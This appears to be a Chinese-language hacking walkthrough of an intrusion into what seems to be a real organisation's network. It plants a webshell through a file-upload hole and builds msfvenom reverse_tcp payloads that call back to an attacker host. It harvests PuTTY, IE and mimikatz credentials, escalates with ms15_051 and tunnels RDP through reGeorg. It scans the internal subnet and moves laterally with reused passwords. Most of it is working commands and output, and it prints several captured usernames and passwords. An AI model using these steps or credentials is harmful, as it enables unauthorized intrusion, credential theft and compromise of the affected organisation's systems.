在http:xxxx.xxx.xx.xxx发现任意文件上传漏洞,果断上传webshell
首先用Metasploit生成反弹马,也就是生成反弹的payload:
成功生成反弹型payload:
(1)生成win下的exe
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe
(2)生成win下的aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
其他的生成payload 的方法见:http://netsec.ws/?p=331
(3)我生成一个aspx的反弹马
然后启动msfconsole
(4)
本地监听,反弹后的控制端:use exploit/multi/handler
(5)
本地监听的确定用哪个payload:
set payload windows/meterpreter/reverse_tcp
(6)
设置本地监听的端口:
set lport 7788
(7)
设置本地的监听的地址:
set lhost 0.0.0.0
(8)
运行:
run
(9)访问生成的反弹马:
http://xxx.xxx.xx.xxx:/back.aspx
得到meterpreter的shell
[/url]
(10)
meterpreter查看路由:
run get_local_subnets
(11)
meterpreter 寻找putty保存的信息
run enum_putty
(12)meterpreter 寻找ie保存的密码
run post/windows/gather/enum_ie
(13)
meterpreter运行cmd
shell
退出cmd shell 为:ctrl+c
[url=http://static.wooyun.org/upload/image/201601/2016013121403047247.png]
(14)
把meterpreter放入后台:
background
(15)
添加路由(这样才能进行内网的扫描):
route add 192.168.0.0 255.255.255.0 1
route add的第一个参数是地址,第二个参数地址是掩码,第三个参数是sessis的id
(在metasploit添加一个路由表,目的是访问10.1.1.129将通过meterpreter的会话 1 来访问:- route add 10.1.1.129 255.255.255.255 1
复制代码
这里如果要代理10.1.1.129/24 到session 1,则可以这么写 - route add 10.1.1.0 255.255.255.0 1
复制代码
)
[/url]
(16)
进行内网的主机扫描:利用smb进行主机识别:
use auxiliary/scanner/smb/smb_version
先看看这个模块需要哪些参数
show options
[url=http://static.wooyun.org/upload/image/201601/2016013121421282394.png]
设置rhost
set rhosts 192.168.0.0/24
设置线程:
set threads 50
run
得到结果:
[/url]
(17)扫描端口:
use auxiliary/scanner/portscan/tcp
设置扫描的范围:
set rhosts 192.168.0.0/24
设置扫描的端口:
set ports 22,23,21,3389,1433,80,8080,81,82
设置线程:
set threads 50
运行:
run
运行结果:
192.168.0.7:23 - TCP OPEN
192.168.0.7:80 - TCP OPEN
192.168.0.18:3389 - TCP OPEN
192.168.0.9:80 - TCP OPEN
192.168.0.9:23 - TCP OPEN
192.168.0.18:1433 - TCP OPEN
192.168.0.5:23 - TCP OPEN
192.168.0.4:23 - TCP OPEN
192.168.0.4:80 - TCP OPEN
192.168.0.6:80 - TCP OPEN
192.168.0.5:80 - TCP OPEN
192.168.0.6:23 - TCP OPEN
Scanned 30 of 256 hosts (11% complete)
192.168.0.55:3389 - TCP OPEN
192.168.0.88:3389 - TCP OPEN
192.168.0.88:1433 - TCP OPEN
192.168.0.88:80 - TCP OPEN
Scanned 73 of 256 hosts (28% complete)
Scanned 81 of 256 hosts (31% complete)
192.168.0.120:80 - TCP OPEN
192.168.0.127:1433 - TCP OPEN
192.168.0.129:1433 - TCP OPEN
192.168.0.128:22 - TCP OPEN
192.168.0.129:80 - TCP OPEN
192.168.0.130:1433 - TCP OPEN
192.168.0.130:3389 - TCP OPEN
192.168.0.127:3389 - TCP OPEN
192.168.0.128:80 - TCP OPEN
192.168.0.135:8080 - TCP OPEN
192.168.0.129:3389 - TCP OPEN
192.168.0.130:8080 - TCP OPEN
192.168.0.134:3389 - TCP OPEN
192.168.0.135:3389 - TCP OPEN
192.168.0.135:1433 - TCP OPEN
192.168.0.131:1433 - TCP OPEN
192.168.0.135:80 - TCP OPEN
192.168.0.131:80 - TCP OPEN
192.168.0.139:80 - TCP OPEN
192.168.0.131:3389 - TCP OPEN
192.168.0.136:80 - TCP OPEN
192.168.0.139:1433 - TCP OPEN
192.168.0.136:8080 - TCP OPEN
192.168.0.136:3389 - TCP OPEN
192.168.0.136:1433 - TCP OPEN
192.168.0.139:3389 - TCP OPEN
192.168.0.139:8080 - TCP OPEN
192.168.0.120:22 - TCP OPEN
Scanned 111 of 256 hosts (43% complete)
Scanned 128 of 256 hosts (50% complete)
192.168.0.155:22 - TCP OPEN
192.168.0.160:1433 - TCP OPEN
192.168.0.160:21 - TCP OPEN
192.168.0.160:82 - TCP OPEN
192.168.0.160:22 - TCP OPEN
192.168.0.161:8080 - TCP OPEN
192.168.0.160:3389 - TCP OPEN
192.168.0.160:80 - TCP OPEN
192.168.0.175:80 - TCP OPEN
192.168.0.172:80 - TCP OPEN
192.168.0.172:82 - TCP OPEN
192.168.0.161:22 - TCP OPEN
192.168.0.161:80 - TCP OPEN
192.168.0.175:1433 - TCP OPEN
192.168.0.175:3389 - TCP OPEN
192.168.0.172:3389 - TCP OPEN
192.168.0.170:1433 - TCP OPEN
192.168.0.176:3389 - TCP OPEN
192.168.0.176:1433 - TCP OPEN
192.168.0.178:3389 - TCP OPEN
192.168.0.176:80 - TCP OPEN
192.168.0.177:1433 - TCP OPEN
192.168.0.178:1433 - TCP OPEN
192.168.0.170:80 - TCP OPEN
192.168.0.174:3389 - TCP OPEN
192.168.0.177:3389 - TCP OPEN
192.168.0.181:80 - TCP OPEN
192.168.0.181:3389 - TCP OPEN
192.168.0.174:80 - TCP OPEN
192.168.0.181:1433 - TCP OPEN
192.168.0.179:3389 - TCP OPEN
192.168.0.179:1433 - TCP OPEN
192.168.0.182:3389 - TCP OPEN
192.168.0.182:80 - TCP OPEN
192.168.0.185:3389 - TCP OPEN
192.168.0.185:1433 - TCP OPEN
192.168.0.189:80 - TCP OPEN
192.168.0.189:21 - TCP OPEN
192.168.0.189:22 - TCP OPEN
192.168.0.185:80 - TCP OPEN
192.168.0.189:8080 - TCP OPEN
192.168.0.189:3389 - TCP OPEN
192.168.0.191:80 - TCP OPEN
192.168.0.188:3389 - TCP OPEN
192.168.0.189:1433 - TCP OPEN
192.168.0.151:22 - TCP OPEN
192.168.0.170:3389 - TCP OPEN
192.168.0.181:8080 - TCP OPEN
192.168.0.179:80 - TCP OPEN
192.168.0.191:3389 - TCP OPEN
Scanned 172 of 256 hosts (67% complete)
Scanned 180 of 256 hosts (70% complete)
192.168.0.200:80 - TCP OPEN
192.168.0.201:22 - TCP OPEN
192.168.0.202:22 - TCP OPEN
192.168.0.203:8080 - TCP OPEN
192.168.0.206:22 - TCP OPEN
192.168.0.205:3389 - TCP OPEN
192.168.0.204:22 - TCP OPEN
192.168.0.216:22 - TCP OPEN
192.168.0.215:3389 - TCP OPEN
192.168.0.203:80 - TCP OPEN
192.168.0.218:80 - TCP OPEN
192.168.0.230:22 - TCP OPEN
192.168.0.233:8080 - TCP OPEN
192.168.0.237:3389 - TCP OPEN
192.168.0.231:22 - TCP OPEN
192.168.0.225:8080 - TCP OPEN
192.168.0.226:22 - TCP OPEN
192.168.0.225:22 - TCP OPEN
192.168.0.227:8080 - TCP OPEN
192.168.0.232:22 - TCP OPEN
192.168.0.236:22 - TCP OPEN
192.168.0.229:22 - TCP OPEN
192.168.0.223:22 - TCP OPEN
192.168.0.234:22 - TCP OPEN
192.168.0.235:3389 - TCP OPEN
192.168.0.205:80 - TCP OPEN
192.168.0.203:22 - TCP OPEN
192.168.0.207:22 - TCP OPEN
192.168.0.227:80 - TCP OPEN
192.168.0.224:22 - TCP OPEN
192.168.0.235:1433 - TCP OPEN
192.168.0.233:22 - TCP OPEN
192.168.0.235:80 - TCP OPEN
Scanned 226 of 256 hosts (88% complete)
192.168.0.238:80 - TCP OPEN
192.168.0.239:80 - TCP OPEN
192.168.0.242:80 - TCP OPEN
192.168.0.243:80 - TCP OPEN
192.168.0.241:80 - TCP OPEN
192.168.0.240:80 - TCP OPEN
192.168.0.253:23 - TCP OPEN
192.168.0.253:80 - TCP OPEN
192.168.0.254:23 - TCP OPEN
192.168.0.252:80 - TCP OPEN
192.168.0.252:23 - TCP OPEN
192.168.0.254:80 - TCP OPEN
Scanned 236 of 256 hosts (92% complete)
Scanned 256 of 256 hosts (100% complete)
Auxiliary module execution completed
在局域网里面寻找匿名ftp:
use auxiliary/scanner/ftp/anonymous
设置ip段:
set rhosts 192.168.0.0/24
设置线程:
set threads 50
运行结果:
[url=http://static.wooyun.org/upload/image/201601/2016013121432824242.png]
在webshell 里面
查看权限:
whoami
权限很高:
[/url]
如果权限低,则查看systeminfo
主要看里面打的补丁:
[url=http://static.wooyun.org/upload/image/201601/2016013121442330933.png]
补丁没有打,所以可以用ms15_051 这个exp秒掉
然后
添加一个账户
[/url]
然后上reGeorg
上传:
tunnel.aspx
然后:
访问:
http:xxx.xxx.xxx.xx/tunnel.aspx
然后发现:
Georg says, 'All seems fine'证明可以使用:
然后:
python reGeorgSocksProxy.py -p 1090 -u [url]http://xxx.xxx.xxx.xxx/download/tunnel.aspx
然后用proxychains访问远程桌面:
proxychains rdesktop -a 16 -u hehe -p Admin#123 127.0.0.1
[/url]
然后上传猕猴桃把密码搞出来:
[url=http://static.wooyun.org/upload/image/201601/2016013121453042480.png]
然后用管理员的账户登陆上去:
[/url]
然后开远程登陆记录,发现管理员用远程登陆记住了192.168.0.136的密码:
登陆上去,然后脱下来本机密码:
[url=http://static.wooyun.org/upload/image/201601/2016013121464733141.png]
截获一个密码是通用密码:
administraror
xseries_ellassay
登陆开了3389的主机
首先:
192.168.0.160
[/url]
然后:
192.168.0.170
用户名:xz
密码:xz
[url=http://static.wooyun.org/upload/image/201601/2016013121472979638.png]
用通用密码登陆192.168.0.181
[/url]
然后通用密码登陆192.168.0.170:
[url=http://static.wooyun.org/upload/image/201601/2016013121491687421.png]
|